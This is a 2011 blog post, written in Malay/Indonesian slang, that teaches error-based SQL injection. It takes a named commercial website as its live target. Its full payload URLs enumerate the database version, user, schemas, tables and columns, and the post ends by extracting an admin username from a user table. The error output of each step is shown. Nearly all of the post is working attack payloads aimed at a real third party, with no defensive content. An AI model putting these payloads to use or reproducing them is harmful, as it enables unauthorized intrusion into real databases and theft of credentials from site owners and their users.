http://aux.iconpedia.net/uploads/10875870971013046993.pnghttp://aux.iconpedia.net/uploads/1540998406962263282.png !

Oktober 07, 2011

Tutorial Error Based SQL Injection [ p0pc0rn ]

Posted by Unknown on 08.45. ,,,, - No comments

Error Based SQL Injection

ane mau ajar kalian sql injection mnggunakan teknik error based.
ada banyak cara untuk lakukan error based nih.
so ane ajar yang simple and basic kalian bisa liat di forum2/blog2 sekuriti/hacking.

thanks to rozalman dia ade kasik satu web so aku leh jadikan sbg example.
before proceed take note,time bila kita leh gunakan teknik nih?

target testing :
Code:
hxxp://www.radiantwholefood.com.my/content.php?cat=136

basically,ini adalah apa yang kalian perlu tahu.

Code:
and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,sayahensem,0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

so di mana yang patutnya kita ubah2 untuk dapatkan hasil yg kita nak?

dari sini ((select concat(0x7e,0x27,sayahensem,0x27,0x7e)) from information_schema.tables limit 0,1)
so basically sama aja dengan teknik2 injection yang lain just kita perlu tukar sedikit aja.


so utk enumurate user,database,dan version yang digunakan.ane lakukan begini
Code:
http://www.radiantwholefood.com.my/content.php
?cat=136 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,version(),0x3a,user(),0x3a,database(),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

hasilnya
[Image: 59981735514715453430.png]

so utk lihat db yg kalian berminat gunakan ini
Code:
http://www.radiantwholefood.com.my/content.php
?cat=136 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

di mana di LIMIT 0,1 kalian naikkan jadi 1,1 utk bisa liat db yg lain.
ane dapat tau db yg ane mau adalah
Code:
Duplicate entry '~'radiant_ezlitev3'~1' for key 1

hexkan nama db tersebut.akan dapat cmni
Code:
0x72616469616e745f657a6c6974657633

mau liat table_name yang wujud dlm db tersebut.
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,table_name,0x27,0x7e) FROM information_schema.tables Where table_schema=0xdb_yang_udah_dihexkan limit 3,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
sama juga, seperti biasa kalian hanya perlu increase number of limit utk cari table yg kalian maubelajar

Code:
http://www.radiantwholefood.com.my/content.php
?cat=136 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,table_name,0x27,0x7e) FROM information_schema.tables Where table_schema=0x72616469616e745f657a6c6974657633 limit 3,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

ane cari table_name yang ane mau iaitu
Code:
Duplicate entry '~'usertb'~1' for key 1

gimana mau liat column_name dalam table_nameitu pula ya?
kalian hanya perlu tambah ini aja.
table_name tukar kepada column_name dan information_schema.tables kepada information_schema.columns dan tambahkan code di bawah ini di dalam injection
Code:
AND table_name=0xtable_name_yg_dah_dihexkan

maka akan jadi begini
Code:
http://www.radiantwholefood.com.my/content.php
?cat=136 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,column_name,0x27,0x7e) FROM information_schema.columns Where table_schema=0x72616469616e745f657a6c6974657633 AND table_name=0x757365727462 limit 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

hasilnya
Code:
Duplicate entry '~'UserName'~1' for key 1

ane pilih column_name username.mau liat isinya pula ane gunakan begini
Code:
and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,table_name.column_name,0x27,0x7e) FROM database_name.table_name LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a

maka akan jadi begini

Code:
http://www.radiantwholefood.com.my/content.php
?cat=136 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,usertb.Username,0x27,0x7e) FROM radiant_ezlitev3.usertb LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
hasilnya
Code:
Duplicate entry '~'admin'~1' for key 1

Panda sekian

mungkin kalian udah dapat faham gunakan teknik ini dengan tutor ini.
sekali lagi.maafkan ane klw ga faham bahasa ane gunakan ea mewek
-----------------------------------------------------------patch---------------------------------------------------------------
(Continue)..

0 komentar:

Posting Komentar